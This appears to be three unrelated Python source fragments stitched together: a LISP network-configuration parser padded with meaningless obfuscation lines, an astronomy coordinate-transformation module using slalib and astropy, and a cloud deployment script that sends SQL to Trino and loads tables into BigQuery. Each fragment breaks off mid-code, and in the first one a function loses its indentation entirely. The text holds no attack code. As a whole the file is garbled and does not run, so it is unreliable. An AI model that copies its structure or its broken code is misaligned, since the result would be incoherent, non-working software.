if 57 - 57: O0 * iIii1I11I1II1 % O0 . OoooooooOO
if 53 - 53: Ii1I / I1IiiI * Ii1I + o0oOOo0O0Ooo + oO0o - Oo0Ooo
if 16 - 16: OoO0O00 % I1Ii111 . i1IIi / I1ii11iIi11i - O0
def lisp_elp_command(kv_pair):
    """Parse an "elp" command clause and register the resulting lisp_elp.

    One lisp_elp_node is created per configured address; per-node keywords
    (probe/strict/eid/address) are applied positionally, reusing the last
    value when a keyword has fewer values than there are nodes.
    """
    elp = None
    elp_nodes = []
    if ("address" in kv_pair):
        for _ in range(len(kv_pair["address"])):
            elp_nodes.append(lisp.lisp_elp_node())
    for keyword in list(kv_pair.keys()):
        values = kv_pair[keyword]
        if (keyword == "elp-name"):
            elp = lisp.lisp_elp(values)
            continue
        for node in elp_nodes:
            index = elp_nodes.index(node)
            # Clamp: reuse the last supplied value for trailing nodes.
            if (index >= len(values)): index = len(values) - 1
            value = values[index]
            if (keyword == "probe"): node.probe = (value == "yes")
            if (keyword == "strict"): node.strict = (value == "yes")
            if (keyword == "eid"): node.eid = (value == "yes")
            if (keyword == "address"): node.address.store_address(value)
    # No elp-name clause: nothing to register.
    if (elp == None): return
    elp.elp_nodes = elp_nodes
    lisp.lisp_elp_list[elp.elp_name] = elp
    return
if 55 - 55: OoO0O00 - I1ii11iIi11i
if 38 - 38: iIii1I11I1II1 % IiII % OoO0O00 % O0 * iIii1I11I1II1 / I1Ii111
if 65 - 65: OOooOOo - I1IiiI * I1Ii111
if 99 - 99: I1IiiI
if 64 - 64: I1ii11iIi11i * Ii1I * Oo0Ooo % IiII % ooOoO0o
if 55 - 55: II111iiii - I1Ii111 - OOooOOo % Ii1I
if 49 - 49: Oo0Ooo * I1Ii111
def lisp_rle_command(kv_pair):
    """Parse an "rle" command clause and register the resulting lisp_rle.

    One lisp_rle_node is created per configured address; per-node keywords
    (level/address) are applied positionally, reusing the last value when a
    keyword has fewer values than there are nodes.
    """
    rle = None
    rle_nodes = []
    if ("address" in kv_pair):
        for _ in range(len(kv_pair["address"])):
            rle_nodes.append(lisp.lisp_rle_node())
    for keyword in list(kv_pair.keys()):
        values = kv_pair[keyword]
        if (keyword == "rle-name"):
            rle = lisp.lisp_rle(values)
            continue
        for node in rle_nodes:
            index = rle_nodes.index(node)
            # Clamp: reuse the last supplied value for trailing nodes.
            if (index >= len(values)): index = len(values) - 1
            value = values[index]
            if (keyword == "level"):
                # An empty level defaults to 0.
                if (value == ""): value = "0"
                node.level = int(value)
            if (keyword == "address"): node.address.store_address(value)
    # No rle-name clause: nothing to register.
    if (rle == None): return
    rle.rle_nodes = rle_nodes
    rle.build_forwarding_list()
    lisp.lisp_rle_list[rle.rle_name] = rle
    return
if 2 - 2: Ii1I
if 12 - 12: i11iIiiIii - iIii1I11I1II1 * IiII * iII111i
if 19 - 19: O0 + oO0o + o0oOOo0O0Ooo
if 81 - 81: iIii1I11I1II1
if 51 - 51: o0oOOo0O0Ooo . I1ii11iIi11i * Ii1I / Oo0Ooo * II111iiii / O0
if 44 - 44: i11iIiiIii % I1Ii111 % oO0o + I11i * oO0o . Ii1I
if 89 - 89: OoooooooOO % II111iiii - OoO0O00 % i11iIiiIii
def lisp_json_command(kv_pair):
    """Register a named JSON blob from a "json" command clause.

    A clause missing either json-name or json-string is silently ignored,
    matching the forgiving behaviour of the other command parsers.

    Fix: the original used a bare 'except:', which also swallowed
    SystemExit/KeyboardInterrupt; only KeyError (missing clause key) is
    the expected failure here.
    """
    try:
        json_name = kv_pair["json-name"]
        json_string = kv_pair["json-string"]
    except KeyError:
        # Incomplete clause: nothing to register.
        return

    entry = lisp.lisp_json(json_name, json_string)
    entry.add()
    return
if 88 - 88: I1Ii111 % OOooOOo - OoOoOO00 - OoOoOO00 . I1IiiI
if 52 - 52: II111iiii / II111iiii / I1IiiI - I1Ii111
if 91 - 91: I1IiiI + o0oOOo0O0Ooo % II111iiii + OoO0O00
if 66 - 66: iIii1I11I1II1 * II111iiii % Oo0Ooo % I1IiiI - Ii1I
if 59 - 59: IiII % oO0o
if 21 - 21: OoooooooOO % OoOoOO00 - OoOoOO00 / I1ii11iIi11i / o0oOOo0O0Ooo
if 15 - 15: ooOoO0o / ooOoO0o % OoooooooOO . I1Ii111
if 93 - 93: I1ii11iIi11i * I1ii11iIi11i / OoooooooOO
if 6 - 6: I1ii11iIi11i * Oo0Ooo + iIii1I11I1II1
if 19 - 19: O0 % II111iiii * o0oOOo0O0Ooo
if 27 - 27: OOooOOo * IiII / i11iIiiIii - oO0o + II111iiii
if 43 - 43: I1ii11iIi11i - II111iiii
def lisp_get_lookup_string ( input_str ) :
if 56 - 56: I1ii11iIi11i . i1IIi / iII111i % oO0o / O0 * I11i
if 98 - 98: O0 + iII111i
if 23 - 23: OoooooooOO . iIii1I11I1II1 / i1IIi
if 31 - 31: Oo0Ooo - iIii1I11I1II1 / I11i . OoO0O00
OOOO0oo0 = input_str
I11iiI1i1 = None
if ( input_str . find ( "->" ) != - 1 ) :
I1i1Iiiii = input_str . split ( "->" )
OOOO0oo0 = I1i1Iiiii [ 0 ]
I11iiI1i1 = I1i1Iiiii [ 1 ]
if 74 - | |
<gh_stars>10-100
from __future__ import print_function
import numpy as np
from . import utils
import astropy.coordinates as c, astropy.units as u
# Optional dependencies are imported in the functions that
# use them. These include enlib.ephem, enlib.iers and enlib.pyfsla
# Python 2/3 compatibility
try: basestring
except NameError: basestring = str
class default_site:
    """Default observing site used by the hor<->cel transforms.

    Angles are in DEGREES: hor2cel/cel2hor multiply lat/lon (and the base
    tilt/azimuth, in tele2hor/hor2tele) by utils.degree before handing them
    to slalib.
    """
    lat = -22.9585       # latitude, degrees
    lon = -67.7876       # longitude, degrees
    alt = 5188.          # altitude, meters
    T = 273.15           # ambient temperature, K
    P = 550.             # pressure, mBar
    hum = 0.2            # relative humidity, fraction
    freq = 150.          # observing frequency, GHz (wavelength = 299792.458/freq um)
    lapse= 0.0065        # tropospheric lapse rate -- presumably K/m (slalib convention); TODO confirm
    base_tilt = 0.0107693    # telescope base tilt, degrees (scaled by utils.degree in tele2hor)
    base_az = -114.9733961   # azimuth of the tilt axis, degrees
def transform(from_sys, to_sys, coords, time=55500, site=default_site, pol=None, mag=None, bore=None):
    """Transforms coords[2,...] from system from_sys to system to_sys, where
    systems can be "hor", "cel" or "gal". For transformations involving
    "hor", the optional arguments time (in modified julian days) and site (which must
    contain .lat (deg), .lon (deg), .P (pressure, mBar), .T (temperature, K),
    .hum (humidity, 0.2 by default), .alt (altitude, m)). Returns an array
    with the same shape as the input. The coordinates are in ra,dec-ordering.

    Note: site angles are degrees, not radians — hor2cel/cel2hor scale them
    by utils.degree before passing them to slalib (the old docstring's
    "(rad)" was wrong). Optional third/fourth input components are treated
    as polarization angle and magnification and updated in the output.
    """
    from_info, to_info = getsys_full(from_sys,time,site,bore=bore), getsys_full(to_sys,time,site,bore=bore)
    # Handedness of each system decides the sign convention of the angle.
    ihand = get_handedness(from_info[0])
    ohand = get_handedness(to_info[0])
    # Apply the specified transformation, optionally computing the induced
    # polarization rotation and apparent magnification
    def transfunc(coords):
        return transform_raw(from_info, to_info, coords, time=time, site=site, bore=bore)
    fields = []
    if pol: fields.append("ang")
    if mag: fields.append("mag")
    # Backwards compatibility: when neither pol nor mag is given explicitly,
    # infer them from the number of input components.
    if pol is None and mag is None:
        if len(coords) > 2: fields.append("ang")
        if len(coords) > 3: fields.append("mag")
    meta = transform_meta(transfunc, coords[:2], fields=fields)
    # Fix the polarization convention. We use healpix
    if "ang" in fields:
        if ihand != ohand: meta.ang -= np.pi
        if ohand != 'L': meta.ang = -meta.ang
    # Create the output array. This is a bit cumbersome because
    # each of the output columns can be either ang or mag, which
    # might or might not have previous values that need to be
    # updated. It is this way to keep backward compatibility.
    res = np.zeros((2+len(fields),) + meta.ocoord.shape[1:])
    res[:2] = meta.ocoord
    off = 2
    for i, f in enumerate(fields):
        if f == "ang":
            # Add the induced rotation to any pre-existing angle.
            if len(coords) > 2: res[off+i] = coords[2] + meta.ang
            else: res[off+i] = meta.ang
        elif f == "mag":
            # Multiply any pre-existing magnification by the induced one.
            if len(coords) > 3: res[off+i] = coords[3] * meta.mag
            else: res[off+i] = meta.mag
    return res
def transform_meta(transfun, coords, fields=["ang","mag"], offset=5e-7):
    """Computes metadata for the coordinate transformation functor
    transfun applied to the coordinate array coords[2,...],
    such as the induced rotation, magnification.

    Currently assumes that input and output coordinates are in
    non-zenith polar coordinates. Might generalize this later.

    Fix: removed a dead allocation — the original built ocoords with
    np.zeros and immediately rebound it to None. (The fields default list
    is never mutated, so it is safe as a default argument.)
    """
    # Number of evaluations of transfun depends on what is requested:
    # 1 for just the mapped point, 2 to estimate the rotation angle by
    # finite differences, 3 to estimate areas by brute force.
    if "mag_brute" in fields: ntrans = 3
    elif "ang" in fields: ntrans = 2
    else: ntrans = 1
    coords = np.asarray(coords)
    offsets = np.array([[0,0],[1,0],[0,1]])*offset
    # Transform all the coordinates. We assume we aren't super-close to the poles
    # either before or after the transformation. ocoords is allocated lazily on
    # the first call so its shape and dtype can follow whatever transfun returns.
    ocoords = None
    for i in range(ntrans):
        # Transpose to get broadcasting right
        a = transfun((coords.T + offsets[i].T).T)
        if ocoords is None:
            ocoords = np.zeros((ntrans,)+a.shape, a.dtype)
        ocoords[i] = a
    class Result: pass
    res = Result()
    res.icoord = coords
    res.ocoord = ocoords[0]
    # Compute the individual properties we're interested in
    diff = utils.rewind(ocoords[1:]-ocoords[0,None])
    if "ang" in fields:
        # We only need the theta offset of this one. We started with
        # an offset in the [1,0] direction, and want to know how
        # far we have rotated away from this direction. This
        # uses the IAU tangent plane angle convention:
        # http://healpix.jpl.nasa.gov/html/intronode12.htm
        # and assumes that both input and output coordinates have the
        # same handedness. This is not always the case, for example
        # with horizontal to celestial coordinate transformations.
        # In these cases, the caller must correct the resulting angle
        # manually.
        phiscale = np.cos(ocoords[0,1])
        res.ang = np.arctan2(diff[0,1],diff[0,0]*phiscale)
    if "mag" in fields:
        res.mag = np.cos(res.icoord[1])/np.cos(res.ocoord[1])
    if "mag_brute" in fields:
        # Compute the ratio of the areas of the triangles
        # made up by the three point-sets in the input and
        # output coordinates. This ratio is always 1 when
        # using physical areas, so we instead compute the
        # apparent areas here.
        def tri_area(diff):
            return 0.5*np.abs(diff[0,0]*diff[1,1]-diff[0,1]*diff[1,0])
        res.mag = (tri_area(diff).T/tri_area(offsets[1:]-offsets[0]).T).T
    return res
def transform_raw(from_sys, to_sys, coords, time=None, site=default_site, bore=None):
    """Transforms coords[2,...] from system from_sys to system to_sys, where
    systems can be "hor", "cel" or "gal". For transformations involving
    "hor", the optional arguments time (in modified julian days) and site (which must
    contain .lat (deg), .lon (deg), .P (pressure, mBar), .T (temperature, K),
    .hum (humidity, 0.2 by default), .alt (altitude, m)). Returns an array
    with the same shape as the input. The coordinates are in ra,dec-ordering.
    coords and time will be broadcast such that the result has the same shape
    as coords*time[None].

    Note: site angles are degrees — hor2cel/cel2hor scale them by
    utils.degree (the old docstring's "(rad)" was wrong).
    """
    # Prepare input and output arrays
    if time is None:
        coords = np.array(coords)[:2]
    else:
        time = np.asarray(time)
        coords = np.asarray(coords)
        # Broadcasting. A bit complicated because we want to handle
        # both time needing to broadcast and coords needing to
        time = time + np.zeros(coords[0].shape,time.dtype)
        coords = (coords.T + np.zeros(time.shape,coords.dtype)[None].T).T
    # flatten, so the rest of the code can assume that coordinates are [2,N]
    # and time is [N]
    oshape = coords.shape
    coords= np.ascontiguousarray(coords.reshape(2,-1))
    if time is not None: time = time.reshape(-1)
    # Perform the actual coordinate transformation. There are three classes of
    # transformations here:
    # 1. To/from object-centered coordinates
    # 2. cel-hor transformation, using slalib
    # 3. cel-gal transformation, using astropy
    (from_sys,from_ref), (to_sys,to_ref) = getsys_full(from_sys,time,site,bore=bore), getsys_full(to_sys,time,site,bore=bore)
    if from_ref is not None: coords[:] = decenter(coords, from_ref[0], restore=from_ref[1])
    # Walk step by step along the chain bore -> tele -> altaz -> icrs ->
    # (astropy systems), updating from_sys until it matches to_sys.
    while True:
        if from_sys == to_sys: break
        elif from_sys == "bore":
            coords[:] = bore2tele(coords, bore)
            from_sys = "tele"
        elif from_sys == "tele" and to_sys in ["bore"]:
            coords[:] = tele2bore(coords, bore)
            from_sys = "bore"
        elif from_sys == "tele":
            coords[:] = tele2hor(coords, site, copy=False)
            from_sys = "altaz"
        elif from_sys == "altaz" and to_sys in ["tele","bore"]:
            coords[:] = hor2tele(coords, site, copy=False)
            from_sys = "tele"
        elif from_sys == "altaz":
            coords[:] = hor2cel(coords, time, site, copy=False)
            from_sys = "icrs"
        elif from_sys == "icrs" and to_sys in ["altaz","tele","bore"]:
            coords[:] = cel2hor(coords, time, site, copy=False)
            from_sys = "altaz"
        else:
            # Neither side is horizontal-like: let astropy do the rest in
            # one step (stripping any hor-specific part of the target).
            to_sys_astropy = nohor(to_sys)
            coords[:] = transform_astropy(from_sys, to_sys_astropy, coords)
            from_sys = to_sys_astropy
    if to_ref is not None: coords[:] = recenter(coords, to_ref[0], restore=to_ref[1])
    return coords.reshape(oshape)
def transform_astropy(from_sys, to_sys, coords):
    """As transform, but only handles the systems supported by astropy."""
    from_sys, to_sys = getsys(from_sys), getsys(to_sys)
    if from_sys == to_sys:
        return coords
    unit = u.radian
    sky = c.SkyCoord(coords[0], coords[1], frame=from_sys, unit=unit)
    sky = sky.transform_to(to_sys)
    # Component attribute names (e.g. ra/dec) differ per output frame.
    lon_name, lat_name = coord_names[to_sys]
    return np.asarray([
        getattr(getattr(sky, lon_name), unit.name),
        getattr(getattr(sky, lat_name), unit.name)])
def transform_euler(euler, coords, pol=None, mag=None):
    """Like transform, but for a set of zyz euler angles instead"""
    fields = []
    if pol: fields.append("ang")
    if mag: fields.append("mag")
    # Backwards compatibility: infer requested fields from input width.
    if pol is None and mag is None:
        if len(coords) > 2: fields.append("ang")
        if len(coords) > 3: fields.append("mag")
    meta = transform_meta(lambda cs: euler_rot(euler, cs), coords[:2], fields=fields)
    out = np.zeros((2 + len(fields),) + meta.ocoord.shape[1:])
    out[:2] = meta.ocoord
    for i, f in enumerate(fields):
        col = 2 + i
        if f == "ang":
            out[col] = meta.ang if len(coords) <= 2 else coords[2] + meta.ang
        elif f == "mag":
            out[col] = meta.mag if len(coords) <= 3 else coords[3] * meta.mag
    return out
def hor2cel(coord, time, site, copy=True):
    """Horizontal -> celestial transform of coord[2,...] via slalib.

    A single representative epoch (the middle time sample) is used to set
    up the slow apparent-place parameters; fine for short scans.

    Fix: the representative-time index used true division (len(time)/2),
    which yields a float and raises TypeError when indexing under
    Python 3; integer division restores Python-2-era behaviour.
    """
    from enlib.coordinates import pyfsla
    from enlib.coordinates import iers
    coord = np.array(coord, copy=copy)
    trepr = time[len(time)//2]
    info = iers.lookup(trepr)
    # Site angles are degrees; slalib wants radians (hence utils.degree).
    ao = pyfsla.sla_aoppa(trepr, info.dUT, site.lon*utils.degree, site.lat*utils.degree, site.alt,
                          info.pmx*utils.arcsec, info.pmy*utils.arcsec, site.T, site.P, site.hum,
                          299792.458/site.freq, site.lapse)
    am = pyfsla.sla_mappa(2000.0, trepr)
    # This involves a transpose operation, which is not optimal
    pyfsla.aomulti(time, coord.T, ao, am)
    return coord
def cel2hor(coord, time, site, copy=True):
    """Celestial -> horizontal transform of coord[2,...] via slalib.

    Fix: same as hor2cel — len(time)/2 is a float index and a TypeError
    under Python 3; use integer division.
    """
    from enlib.coordinates import pyfsla
    from enlib.coordinates import iers
    # This is very slow for objects near the horizon!
    coord = np.array(coord, copy=copy)
    trepr = time[len(time)//2]
    info = iers.lookup(trepr)
    # Site angles are degrees; slalib wants radians (hence utils.degree).
    ao = pyfsla.sla_aoppa(trepr, info.dUT, site.lon*utils.degree, site.lat*utils.degree, site.alt,
                          info.pmx*utils.arcsec, info.pmy*utils.arcsec, site.T, site.P, site.hum,
                          299792.458/site.freq, site.lapse)
    am = pyfsla.sla_mappa(2000.0, trepr)
    # This involves a transpose operation, which is not optimal
    pyfsla.oamulti(time, coord.T, ao, am)
    return coord
def tele2hor(coord, site, copy=True):
    """Rotate telescope coordinates into horizontal ones using the site's base tilt."""
    angles = [site.base_az*utils.degree, site.base_tilt*utils.degree, -site.base_az*utils.degree]
    return euler_rot(angles, np.array(coord, copy=copy))
def hor2tele(coord, site, copy=True):
    """Rotate horizontal coordinates into telescope ones (inverse base tilt)."""
    angles = [site.base_az*utils.degree, -site.base_tilt*utils.degree, -site.base_az*utils.degree]
    return euler_rot(angles, np.array(coord, copy=copy))
def tele2bore(coord, bore, copy=True):
    """Rotate coordinates [{ra,dec},...] into the frame of the boresight pointing
    bore[{ra,dec},...] (same shape as coord). Afterwards the boresight sits at
    the zenith, with points above it at 'ra'=180 and points below at 'ra'=0."""
    return recenter(np.array(coord, copy=copy), bore)
def bore2tele(coord, bore, copy=True):
    """Inverse of tele2bore: rotate boresight-relative coordinates
    [{ra,dec},...] back into telescope coordinates (similar to horizontal
    coordinates), given the boresight pointing bore[{ra,dec},...]."""
    return decenter(np.array(coord, copy=copy), bore)
def euler_mat(euler_angles, kind="zyz"):
    """Defines the rotation matrix M for a ABC euler rotation,
    such that M = A(alpha)B(beta)C(gamma), where euler_angles =
    [alpha,beta,gamma]. The default kind is ABC=ZYZ.

    NOTE(review): euler_mat and euler_rot are each defined twice in this
    module; this first copy is shadowed by the identical one further down.
    One pair should be deleted.
    """
    alpha, beta, gamma = euler_angles
    R1 = utils.rotmatrix(gamma, kind[2])
    R2 = utils.rotmatrix(beta, kind[1])
    R3 = utils.rotmatrix(alpha, kind[0])
    return np.einsum("...ij,...jk->...ik",np.einsum("...ij,...jk->...ik",R3,R2),R1)
def euler_rot(euler_angles, coords, kind="zyz"):
    """Apply the euler rotation given by euler_angles to coords[2,...].

    NOTE(review): shadowed by the identical definition further down in this
    module; one copy should be deleted.
    """
    coords = np.asarray(coords)
    co = coords.reshape(2,-1)
    M = euler_mat(euler_angles, kind)
    rect = utils.ang2rect(co, False)
    rect = np.einsum("...ij,j...->i...",M,rect)
    co = utils.rect2ang(rect, False)
    return co.reshape(coords.shape)
def euler_mat(euler_angles, kind="zyz"):
    """Return the rotation matrix M = A(alpha)B(beta)C(gamma) for an ABC
    euler rotation with euler_angles = [alpha,beta,gamma]. The default
    convention is ABC=ZYZ."""
    alpha, beta, gamma = euler_angles
    # Accumulate left-to-right: ((A·B)·C), matching the original grouping.
    M = utils.rotmatrix(alpha, kind[0])
    M = np.einsum("...ij,...jk->...ik", M, utils.rotmatrix(beta, kind[1]))
    M = np.einsum("...ij,...jk->...ik", M, utils.rotmatrix(gamma, kind[2]))
    return M
def euler_rot(euler_angles, coords, kind="zyz"):
    """Apply the euler rotation given by euler_angles to coords[2,...]
    (ra,dec ordering), returning an array of the same shape."""
    coords = np.asarray(coords)
    flat = coords.reshape(2, -1)
    # Rotate in rectangular coordinates, then convert back to angles.
    rect = utils.ang2rect(flat, False)
    rect = np.einsum("...ij,j...->i...", euler_mat(euler_angles, kind), rect)
    return utils.rect2ang(rect, False).reshape(coords.shape)
def recenter(angs, center, restore=False):
"""Recenter coordinates "angs" (as ra,dec) on the location given by "center",
such that center | |
replicas
announce("Waiting for deployments to be available")
spinWait(lambda: waitUntilDeploymentsAvail(4, namespace))
# now the load balancers need to be running with their IPs assigned
announce("Waiting for load-balancers to launch")
spinWait(lambda: waitUntilLoadBalancersUp(services, namespace))
#
# Get the DNS name of the load balancers we've created
#
lbs = getLoadBalancers(services, namespace)
# we should have a load balancer for every service we'll forward
assert len(lbs) == len(services)
for svc in services:
assert svc in lbs
tuns.append(Tunnel(svc, ipaddress.IPv4Address(bastionIp),
getLclPort(svc), lbs[svc], getRmtPort(svc)))
# make sure the load balancers are actually responding
announce("Waiting for load-balancers to start responding")
spinWait(lambda: waitUntilLoadBalancersUp(services, namespace,
checkConnectivity = True))
# TODO AWS Doesn't support specification of a static IP for the ELB, so we
# cannot set up Route53 in Terraform to point to a static IP. Instead we
# need to use the aws cli to hand-modify the Route53 entries to create
# aliases to our load-balancer DNS names.
if target == "aws":
assert route53ZoneId
setRoute53Cname(lbs, route53ZoneId)
return tuns
class ApiError(Exception):
    """Raised when the SQL REST API reports an error for a statement."""
    pass
def retryHttp(f, maxretries: int, descr: str) -> requests.Response:
    """Call the request thunk f() until it yields a response, retrying
    connection failures with exponential backoff.

    f: zero-argument callable performing the HTTP request.
    maxretries: number of connection-error retries before re-raising.
    descr: human-readable label used in progress messages.
    Returns the requests.Response from the first successful call.
    Raises requests.exceptions.ConnectionError once maxretries is exceeded.
    """
    retries = 0
    stime = 1
    while True:
        try:
            r = f()
            # Service temporarily unavailable: wait briefly and retry.
            # NOTE(review): 503 responses are NOT counted against
            # maxretries, so a persistently unavailable service loops
            # here forever -- confirm this is intended.
            if r.status_code == 503:
                time.sleep(0.5)
                continue
            # All good -- we exit here.
            if retries > 0:
                print(f"Succeeded on \"{descr}\" after {retries} retries")
            return r
        except requests.exceptions.ConnectionError as e:
            print(f"Failed to connect: \"{descr}\"; retries={retries}; "
                  f"sleep={stime}")
            if retries > maxretries:
                print(f"{maxretries} retries exceeded!")
                raise
            # Exponential backoff: 1s, 2s, 4s, ...
            time.sleep(stime)
            retries += 1
            stime <<= 1
def sendSql(command: str, verbose = False) -> list:
    """Execute a SQL statement against the Trino/Starburst REST API and
    return all result rows as a list.

    Follows the statement protocol: POST to /v1/statement, then GET each
    "nextUri" until no continuation URI remains, accumulating any "data"
    pages along the way.
    Raises ApiError if the server reports an execution error.
    Relies on module-level config: trinouser, trinopass, tlsenabled,
    tlsinternal, secrets, getStarburstUrl.
    """
    httpmaxretries = 10
    if verbose: announceSqlStart(command)
    url = getStarburstUrl() + "/v1/statement"
    hdr = { "X-Trino-User": trinouser }
    authtype = None
    if tlsenabled():
        authtype = requests.auth.HTTPBasicAuth(trinouser, trinopass)
    # For internal TLS, verify against our own wildcard cert bundle.
    f = lambda: requests.post(url, headers = hdr, auth = authtype, data =
            command, verify = secrets["wildcert"]["f"] if tlsinternal else
            None)
    r = retryHttp(f, maxretries = httpmaxretries, descr = f"POST [{command}]")
    data = []
    while True:
        r.raise_for_status()
        assert r.status_code == 200
        j = r.json()
        # Accumulate this page of rows, if any.
        if "data" in j:
            data += j["data"]
        if "nextUri" not in j:
            # Terminal response: either an error or final success.
            if "error" in j:
                raise ApiError("Error executing SQL '{s}': error {e}".format(s
                    = command, e = str(j["error"])))
            if verbose: announceSqlEnd(command)
            return data # the only way out is success, or an exception
        # Poll the continuation URI for the next page. The lambda is
        # called immediately by retryHttp, so binding j here is safe.
        if tlsinternal:
            f = lambda: requests.get(j["nextUri"], headers = hdr, verify =
                secrets["wildcert"]["f"])
        else:
            f = lambda: requests.get(j["nextUri"], headers = hdr, verify =
                None)
        r = retryHttp(f, maxretries = httpmaxretries,
            descr = f"GET nextUri [{command}]")
def dontLoadCat(cat: str) -> bool:
    """Return True for catalogs that should never be loaded with data."""
    skip = {tpchcat, syscat, sfdccat}
    # Synapse serverless pools are read-only
    if target == "az":
        skip.add(synapseslcat)
    if cat in skip:
        return True
    return cat.startswith("sg_")
def getTpchTableSize(scale: str, table: str) -> int:
    """Return the cached row count of `table` at tpch scale `scale`."""
    global tpchtables
    assert table in tpchtables
    assert scale in tpchbuckets
    tsizes = tpchbuckets[scale]["tsizes"]
    assert table in tsizes
    return tsizes[table]
class CommandGroup:
    """Tracks a group of asynchronous copy/load commands.

    Each command runs on its own thread; progress is accounted in work
    units (1 per plain SQL command, or the row count for table copies)
    under a condition variable so callers can poll ratioDone() and block
    in waitOnAllCopies().
    """
    def __init__(self):
        self.cv = threading.Condition()
        self.workToDo = 0   # total work units registered via add* methods
        self.workDone = 0   # work units completed by worker threads
    # Methods modifying state protected by cv (condition variable) lock
    # Must be called with lock held--and this is only called by wait_for on the
    # condition variable, which always guarantees the lock is held
    def allCommandsDone(self) -> bool:
        assert self.workDone <= self.workToDo
        return self.workDone == self.workToDo
    def ratioDone(self) -> float:
        """Fraction of registered work completed, in [0.0, 1.0]."""
        with self.cv:
            assert self.workDone <= self.workToDo, \
                f"{self.workDone} should be <= {self.workToDo}"
            # It's possible that no commands were processed, in which case
            # avoid doing a division-by-zero by saying we're finished.
            ratio = float(self.workDone) / self.workToDo \
                if self.workToDo > 0 else 1.0
            return ratio
    def checkCopiedTable(self, dstCatalog: str, dstSchema: str, dstTable: str,
                         rows: int) -> None:
        """Best-effort verification that a copied table has `rows` rows;
        problems are reported to stdout, never raised."""
        dest = "{dc}.{ds}.{dt}".format(dc = dstCatalog, ds = dstSchema,
                                       dt = dstTable)
        try:
            copiedRows = sendSql(f"select count(*) from {dest}")[0][0]
            if copiedRows < rows:
                print(f"Tried to process {rows}, only did {copiedRows}")
        except ApiError as e:
            print(f"Couldn't read rows from {dest}")
    def processSqlCommand(self, cmd: str, callback = None) -> None:
        """Worker body: run one SQL command, hand results to callback,
        then record one unit of completed work."""
        x = sendSql(cmd)
        if callback:
            callback(x)
        with self.cv:
            self.workDone += 1
            self.cv.notify_all()
    def addSqlCommand(self, cmd, callback = None) -> None:
        """Register and start a thread running a single SQL command
        (counts as one work unit)."""
        t = threading.Thread(target = self.processSqlCommand,
                             args = (cmd, callback, ))
        with self.cv:
            self.workToDo += 1
            t.start()
    def processSqlTableCommand(self, srcTable: str, dstCatalog: str,
                               dstSchema: str, rows: int, cmd: str = None,
                               check: bool = False) -> None:
        """Worker body: optionally run a table-copy SQL command, optionally
        verify the destination row count, then credit `rows` work units."""
        if cmd:
            sendSql(cmd)
        if check:
            self.checkCopiedTable(dstCatalog, dstSchema, srcTable, rows)
        # We get here whether it works or not
        with self.cv:
            self.workDone += rows
            self.cv.notify_all()
    def addSqlTableCommand(self, tpchSchema: str, srcTable: str,
                           dstCatalog: str, dstSchema: str, cmd: str = None,
                           check: bool = False) -> None:
        """Register and start a table-copy thread; work is weighted by the
        tpch table's row count."""
        rows = getTpchTableSize(tpchSchema, srcTable)
        t = threading.Thread(target = self.processSqlTableCommand,
                             args = (srcTable, dstCatalog, dstSchema, rows, cmd, check, ))
        with self.cv:
            self.workToDo += rows
            t.start()
    def processBqCommand(self, srcCatalog: str, srcSchema: str, srcTable: str,
                         dstSchema: str, rows: int, check: bool = False) -> None:
        """Worker body: load a table into BigQuery from GCS ORC files
        exported under {srcCatalog}/{srcSchema}/{srcTable}/, then credit
        `rows` work units."""
        assert srcCatalog == hivecat
        # Get the list of files to be loaded
        storage_client = storage.Client()
        blobs = storage_client.list_blobs(bucket,
            prefix=f"{srcCatalog}/{srcSchema}/{srcTable}/")
        # Skip "directory" placeholder objects ending in '/'.
        paths = [f"gs://{bucket}/{b.name}" for b in blobs if b.name[-1] != '/']
        assert len(paths) > 0
        # Construct a BigQuery client object.
        client = bigquery.Client()
        # TODO this could break if someone changes to Parquet format
        job_config = bigquery.LoadJobConfig(write_disposition =
            bigquery.WriteDisposition.WRITE_EMPTY, source_format =
            bigquery.SourceFormat.ORC,)
        table_id = "{dp}.{ds}.{st}".format(dp = gcpproject, ds = dstSchema,
                                           st = srcTable)
        try:
            load_job = client.load_table_from_uri(paths, table_id,
                job_config=job_config)  # Make an API request.
            load_job.result()  # Waits for the job to complete.
        except google.api_core.exceptions.Conflict as e:
            # This exception indicates that there was already a table. That's
            # fine and we can completely ignore that message.
            pass
        # This check should pass even if we got a write conflict
        destination_table = client.get_table(table_id)
        assert destination_table.num_rows == rows
        if check:
            self.checkCopiedTable(bqcat, dstSchema, srcTable, rows)
        # We get here whether it works or not
        with self.cv:
            self.workDone += rows
            self.cv.notify_all()
    def addBqCommand(self, tpchSchema: str, srcCatalog: str, srcSchema: str,
                     srcTable: str, dstSchema: str, check: bool = False) -> None:
        """Register and start a BigQuery-load thread; work is weighted by
        the tpch table's row count."""
        rows = getTpchTableSize(tpchSchema, srcTable)
        t = threading.Thread(target = self.processBqCommand,
                             args = (srcCatalog, srcSchema, srcTable, dstSchema, rows,
                                     check,))
        with self.cv:
            self.workToDo += rows
            t.start()
    def waitOnAllCopies(self) -> None:
        """Block until every registered work unit has been completed."""
        with self.cv:
            self.cv.wait_for(self.allCommandsDone)
def preloadTpchTableSizes(scaleSets: set[str]) -> None:
    """Populate the tpchtables name cache and, for every scale in
    scaleSets, the per-table row-count cache tpchbuckets[scale]["tsizes"],
    issuing the count(*) queries concurrently via a CommandGroup."""
    # First, get the list of table names
    #
    global tpchtables, tpchbuckets
    assert len(scaleSets) > 0
    scale = next(iter(scaleSets))
    if not tpchtables:
        tabs = sendSql(f"show tables in {tpchcat}.{scale}")
        tpchtables = {t[0] for t in tabs}
    announce("Getting tpch table sizes for scale sets -> "
             "{}".format(", ".join(scaleSets)))
    # Next, fill in the sizes of each of the tables for each scale
    #
    cg = CommandGroup()
    for scale in scaleSets:
        assert scale in tpchbuckets
        b = tpchbuckets[scale]["tsizes"]
        lock = threading.Lock()
        for table in tpchtables:
            if table not in b:
                # callback will make a closure with b[table], storing the
                # results there that come back from the SQL call. We have to
                # use an odd construction here because Python performs
                # late-binding with closures; to force early binding we'll use
                # a function-factory. https://tinyurl.com/4x3t2wux
                # NOTE(review): `lock` is NOT passed through the factory, so
                # cbs late-binds it and callbacks may end up using the lock
                # created for the *last* scale. Each callback writes a
                # distinct key, so this is likely benign -- confirm.
                def make_cbs(b, scale, table):
                    def cbs(tablesize):
                        with lock:
                            b[table] = tablesize[0][0]
                    return cbs
                cg.addSqlCommand("select count(*) from "
                                 f"{tpchcat}.{scale}.{table}",
                                 callback = make_cbs(b, scale, table))
    spinWait(cg.ratioDone)
    cg.waitOnAllCopies() # Should be a no-op
